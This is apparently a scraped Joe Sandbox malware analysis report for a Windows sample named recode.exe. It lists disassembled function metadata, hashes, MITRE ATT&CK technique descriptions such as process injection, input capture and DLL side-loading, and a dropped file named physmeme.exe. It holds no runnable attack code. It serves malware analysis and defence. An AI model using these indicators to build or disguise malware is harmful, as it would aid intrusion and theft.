Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: c8c8c26d43e09b7e850ebd019a0cc54fdadab2a66a6ed7130621ffea5c311180
Instruction ID: 6b0b55038b2f1a539ad109230dc41d54c906b4d2f01a71d7a6454f22255de2ce
Opcode Fuzzy Hash: c8c8c26d43e09b7e850ebd019a0cc54fdadab2a66a6ed7130621ffea5c311180
Instruction Fuzzy Hash: 8F31092270878186EE16EF12D54436DE351AB04BD4FC90635DA6D0FBC5DE3CE0498318

Function 00007FF758045390 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7580453FD

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: ea7894f2927e8f2b34c84c2d86d6bab33a3e4f012fec9ce584e05b276012386e
Instruction ID: cd6c65c35ddb9dadf07b12ea1b32fb81d18cd17c2e6ca49c9f531e40066b6280
Opcode Fuzzy Hash: ea7894f2927e8f2b34c84c2d86d6bab33a3e4f012fec9ce584e05b276012386e
Instruction Fuzzy Hash: BA31E433F0578186FA157B65A5403B9D250AB44BE9FAC0231DE6C0B7E2DE7C94C68364

Function 00007FF758002F90 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF75800306C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF7580030A0
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF7580030AA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580030D3

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 11bf5eb280c4525fc68ff5f360c2f1326b8ba35f243bdb200eb7ac24a2820396
Instruction ID: bc2fefa85e5b99763ab1e82bafcba7fd6c5c393cbd75ec1bd7b8d8955d84e40a
Opcode Fuzzy Hash: 11bf5eb280c4525fc68ff5f360c2f1326b8ba35f243bdb200eb7ac24a2820396
Instruction Fuzzy Hash: 6F31F662B09B45C6EE11FB51E4143BAE351AB04BD4FEC0631DA6D077D5DE3CE0898328

Function 00007FF7580462E0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463A6
memmove.VCRUNTIME140(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463C9
memmove.VCRUNTIME140(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463D8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580463F9

Part of subcall function 00007FF75805E490: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF758001050), ref: 00007FF75805E4AA

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 81b23eba5bb18c0099888dd0aab49fdbcfc5110e8b58bad0e52a927794c3d872
Instruction ID: 70fa03d3e9828ca5639eb30a5a89cc8c6793ffbaaf7cf5c42cccb34965ad0747
Opcode Fuzzy Hash: 81b23eba5bb18c0099888dd0aab49fdbcfc5110e8b58bad0e52a927794c3d872
Instruction Fuzzy Hash: 0A31D922F4568582FE24AF52E5013BAE251AF44BE4F9C4631DEBD477D1EE3CE0898314

Function 00007FF758045600 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF758045643
memmove.VCRUNTIME140 ref: 00007FF758045704
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF758045728

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: 05cd3845b840d3792c2e897e94c4d63ad794183fdbdbf34c3f5be91ce9576ca4
Instruction ID: 899f5e7a53d26a40257c11d1990040c8b42998846d4ed1fe96f797f38609693a
Opcode Fuzzy Hash: 05cd3845b840d3792c2e897e94c4d63ad794183fdbdbf34c3f5be91ce9576ca4
Instruction Fuzzy Hash: D231C272B4A74186EA24BF52A4002B9E290AB047F4FDC0B30EEBD177E5DE7CE4958314

Function 00007FF758004260 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF75800386C), ref: 00007FF7580042C1
memset.VCRUNTIME140(?,?,?,00007FF75800386C), ref: 00007FF75800431B

Strings

imgui.ini, xrefs: 00007FF7580042C6
imgui_log.txt, xrefs: 00007FF7580042DB

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID: imgui.ini$imgui_log.txt
API String ID: 2221118986-3179804127
Opcode ID: 9604c0c4c3dc16009807ad666d92c0873ae813ac4ab9565bf436d71af7b77d14
Instruction ID: 9c0760d8ca1042e3a767605e0b0f85fdc8d2b3ae40c77bcbf1c03fb6c4fefe4d
Opcode Fuzzy Hash: 9604c0c4c3dc16009807ad666d92c0873ae813ac4ab9565bf436d71af7b77d14
Instruction Fuzzy Hash: 9F51F7F21057819AC711EF39D564389BBACF721B48F688239DA580F7A8CB728159CB94

Function 00007FF7580030E0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00007FF758001A25), ref: 00007FF758003118
memmove.VCRUNTIME140(?,?,?,?,00007FF758001A25), ref: 00007FF7580031B8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580031D6

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: 17bdc4cbfafedb4f7405804ec96cde804c1820f6ec73a23ebd27b513ab11e5b6
Instruction ID: ffe9426e4f444fbe7dd2b00ba06d1f18c2a57638e14eea18ede2b2d9d3d4ab5c
Opcode Fuzzy Hash: 17bdc4cbfafedb4f7405804ec96cde804c1820f6ec73a23ebd27b513ab11e5b6
Instruction Fuzzy Hash: 4721C922B09B45CAEA15BB51A5403B9D2509F097A5FDD0630DE7D077D2DE7C90968324

Function 00007FF75805FBB8 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF75805FC01
GetLastError.KERNEL32 ref: 00007FF75805FC0F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF758002EA5), ref: 00007FF75805FC44
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF758002EA5), ref: 00007FF75805FC52

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: cc21509799f5a59095dc19b508f44cfeb04c6dd9da56b92675c8fa047fa0f0e3
Instruction ID: c46e78fca8f00b14c4081323d59285c7ae6cc82dead08ea319c290610f36b07b
Opcode Fuzzy Hash: cc21509799f5a59095dc19b508f44cfeb04c6dd9da56b92675c8fa047fa0f0e3
Instruction Fuzzy Hash: 24214C72A18B8187E3109F12A54431EFBB4F788B84F580235DB8D53B95CF3DD4598B14

Function 00007FF7580014C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF7580014CB
__std_exception_copy.VCRUNTIME140 ref: 00007FF758001504

Strings

string too long, xrefs: 00007FF7580014C4

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Xlength_error@std@@__std_exception_copy
String ID: string too long
API String ID: 127952674-2556327735
Opcode ID: a36fe3bd64e8d01be716ecf1f2e41c7e1e397b6bbd99eee96c63571de0c1c45c
Instruction ID: 4b2b88c4316a7a4f37a4e9fd3e212bd8cbb497edf3e3ce08e73075500ba998fb
Opcode Fuzzy Hash: a36fe3bd64e8d01be716ecf1f2e41c7e1e397b6bbd99eee96c63571de0c1c45c
Instruction Fuzzy Hash: 3FE03061B15A45D6EB01AF22E8901A8B364EB28B54BC88131CA5D46360EF3CA6DDC314

Function 00007FF7580252C0 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF758025379
memset.VCRUNTIME140 ref: 00007FF75802538B
memset.VCRUNTIME140 ref: 00007FF7580253A1
memset.VCRUNTIME140 ref: 00007FF7580254AC

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d815b08ba6e3f4ef5a275cd9110b4b208298552b0475e124e2fa55624f721ea4
Instruction ID: 0510f5d76ea63bc31efa45db93305a04c0798e319c8fcd884dbff3c5409aae59
Opcode Fuzzy Hash: d815b08ba6e3f4ef5a275cd9110b4b208298552b0475e124e2fa55624f721ea4
Instruction Fuzzy Hash: B8511132A14BD482D694DF2AD0412BAF366FF49B80F5C832ADE9923791DF39E058C344

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report recode.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\Speech\physmeme.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
recode.exe

Function 00007FF758002610 Relevance: 44.1, APIs: 6, Strings: 19, Instructions: 324
processCOMMON

Function 00007FF75805FC84 Relevance: 33.2, APIs: 22, Instructions: 224
fileCOMMON

Function 00007FF758053150 Relevance: 32.1, APIs: 15, Strings: 3, Instructions: 642
windowCOMMON

Function 00007FF758031B60 Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 91
libraryloaderCOMMON

Function 00007FF758031D00 Relevance: 16.7, APIs: 11, Instructions: 193
keyboardCOMMON

Function 00007FF758030610 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 288
COMMON

Function 00007FF758019C70 Relevance: 15.0, APIs: 10, Instructions: 50
clipboardmemoryCOMMON

Function 00007FF758047400 Relevance: 13.8, APIs: 9, Instructions: 350
COMMON

Function 00007FF758035470 Relevance: 12.3, APIs: 8, Instructions: 278
COMMON

Function 00007FF75802E7E0 Relevance: 12.3, APIs: 8, Instructions: 253
COMMON